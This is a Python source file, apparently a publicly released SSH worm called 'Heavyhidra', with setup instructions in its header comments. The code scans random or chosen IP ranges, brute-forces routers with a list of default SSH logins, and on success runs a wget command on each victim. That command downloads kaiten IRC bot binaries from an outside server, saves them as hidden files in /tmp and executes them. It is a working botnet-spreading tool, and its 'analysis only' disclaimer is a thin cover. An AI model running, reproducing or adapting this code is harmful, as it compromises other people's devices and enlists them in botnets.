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#!/usr/bin/env python
#~WhitePacket
#Lightaidra sucked, so here's 2.0 - will infect thousands of routers.
# To setup, follow the instructions
#-Download kaiten.c from https://dl.packetstormsecurity.net/irc/kaiten.c
#-Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
#-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name.
# Set some stuff on your servers so you don't get capped at 476 open SSH connections.
#-ulimit -n 99999
#-sysctl -w fs.file-max=100000
# Run heavyhidra
#-python infect.py 376 LUCKY x 0
#-python infect.py 376 B 113.53 1
# Donate BTC: 13rddMd7ErFQYsjYPfYAnqxmPzZxQPrVyo
#NOTE: I wrote this back when I didn't code professionally, and on Tuesday, September 8th 2015 I decided to officially release it. Don't expect quality code, but working code.
#Disclaimer: use this for code analysis and entertainment purposes only. The code is quite funny, old, works incredibly well and you are completely liable for anything done on it. I do not permit execution of the following code:
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam.
files = [ #Files in which we would like to execute upon the routers.
"kaiten-sh4",
"kaiten-powerpc",
"kaiten-mipsel",
"kaiten-mips",
"kaiten-armv5l"
]
website = "123.123.123.123" #Public facing IP hosting the IRC bot binaries.
reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull.
'http://127.',
'http://0',
'http://10.',
'http://100.64',
'http://100.65',
'http://100.66',
'http://100.67',
'http://100.68',
'http://100.69',
'http://100.70',
'http://100.71',
'http://100.72',
'http://100.73',
'http://100.74',
'http://100.75',
'http://100.76',
'http://100.77',
'http://100.78',
'http://100.79',
'http://100.80',
'http://100.81',
'http://100.82',
'http://100.83',
'http://100.84',
'http://100.85',
'http://100.86',
'http://100.87',
'http://100.88',
'http://100.89',
'http://100.90',
'http://100.91',
'http://100.92',
'http://100.93',
'http://100.94',
'http://100.95',
'http://100.96',
'http://100.97',
'http://100.98',
'http://100.99',
'http://100.100',
'http://100.101',
'http://100.102',
'http://100.103',
'http://100.104',
'http://100.105',
'http://100.106',
'http://100.107',
'http://100.108',
'http://100.109',
'http://100.110',
'http://100.111',
'http://100.112',
'http://100.113',
'http://100.114',
'http://100.115',
'http://100.116',
'http://100.117',
'http://100.118',
'http://100.119',
'http://100.120',
'http://100.121',
'http://100.122',
'http://100.123',
'http://100.124',
'http://100.125',
'http://100.126',
'http://100.127',
'http://169.254',
'http://172.16.',
'http://172.17.',
'http://172.18.',
'http://172.19.',
'http://172.20.',
'http://172.21.',
'http://172.22.',
'http://172.23.',
'http://172.24.',
'http://172.25.',
'http://172.26.',
'http://172.27.',
'http://172.28.',
'http://172.29.',
'http://172.30.',
'http://172.32.',
'http://192.0.0.0',
'http://192.0.0.1',
'http://192.0.0.2',
'http://192.0.0.3',
'http://192.0.0.4',
'http://192.0.0.5',
'http://192.0.0.6',
'http://192.0.0.7',
'http://192.0.2.',
'http://192.88.99.',
'http://192.168.',
'http://198.18.',
'http://198.19.',
'http://198.51.100.',
'http://203.0.113.',
'http://224.',
'http://225'
]
passwords = [ #Some default SSH logins.
"root:root", #This one is the least secure and ironically most effective.
"root:toor",
"admin:admin",
"root:123qwe",
"root:redtube",
"root:admin",
"root:1111",
"test:test",
"root:ferrari",
"root:1q2w3e4r5t",
"root:test",
"root:1234",
"root:1q2w3e",
"root:qwerty"
]
print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate.
if sys.argv[4] == '1':
passwords = [ "root:root" ] #Faster exploitation with somewhat less results.
ipclassinfo = sys.argv[2]
if ipclassinfo == "A":
ip1 = sys.argv[3]
elif ipclassinfo == "B":
ip1 = sys.argv[3].split(".")[0]
ip2 = sys.argv[3].split(".")[1]
elif ipclassinfo == "C":
ips = sys.argv[3].split(".")
num=0
for ip in ips:
num=num+1
if num == 1:
ip1 = ip
elif num == 2:
ip2 = ip
elif num == 3:
ip3 = ip
class sshscanner(threading.Thread):
global passwords
global ipclassinfo
if ipclassinfo == "A":
global ip1
elif ipclassinfo == "B":
global ip1
global ip2
elif ipclassinfo == "C":
global ip1
global ip2
global ip3
def run(self):
while 1:
try:
while 1:
thisipisbad='no'
if ipclassinfo == "A":
self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "B":
self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "C":
self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY":
lucky = ["186.115","31.176","113.53","186.113","190.254","190.255","186.114","95.9","95.6","118.174","190.65","203.249","190.66","190.67","122.176","187.109","60.51","186.119","95.169","190.69","190.253","122.168","201.75","117.156","188.59","177.11","182.74","190.68","118.173","190.252","165.229","84.122"]
self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
else:
self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
for badip in reservedips:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break
self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this.
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.host, port))
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
dobreak=True
break
except:
pass
if True == dobreak:
break
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
for theFile in files:
websites.append("wget http://"+website+"/"+theFile+" -O /tmp/."+theFile+"; chmod +x /tmp/."+theFile+"; /tmp/."+theFile+" &") #Save it as a hidden file, of course.
if badserver == False:
print 'Infected: '+username+'<'+password+'>'+self.host+'|'+str(port)
for web in websites:
for a in ["wget", "wget1"]:
try:
ssh.exec_command(web.replace("wget",a))
except:
pass
ssh.close()
except:
pass
for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators.
try:
t = sshscanner()
t.start()
except:
pass